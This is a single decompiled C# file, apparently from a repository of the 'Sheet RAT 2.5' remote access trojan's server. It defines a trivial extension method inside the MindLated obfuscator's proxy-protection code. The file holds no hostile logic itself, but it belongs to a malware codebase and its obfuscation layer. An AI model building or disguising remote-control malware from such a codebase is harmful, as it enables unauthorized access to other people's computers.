Files
sheet-rat/Server/MindLated/Protection/Proxy/EnumerableExtensions.cs
T
2026-08-27 11:23:25 -06:00

17 lines
524 B
C#

// Decompiled with JetBrains decompiler
// Type: MindLated.Protection.Proxy.EnumerableExtensions
// Assembly: Server, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 33673F0A-7F43-4A2B-BC08-8E59A15CB7DA
// Assembly location: C:\Users\Admin\Desktop\Sheet RAT 2.5\Server.exe
using System.Collections.Generic;
//#nullable disable
namespace MindLated.Protection.Proxy {
public static class EnumerableExtensions
{
public static T Random<T>(this IEnumerable<T> input) => EnumerableHelper.Random<T>(input);
}
}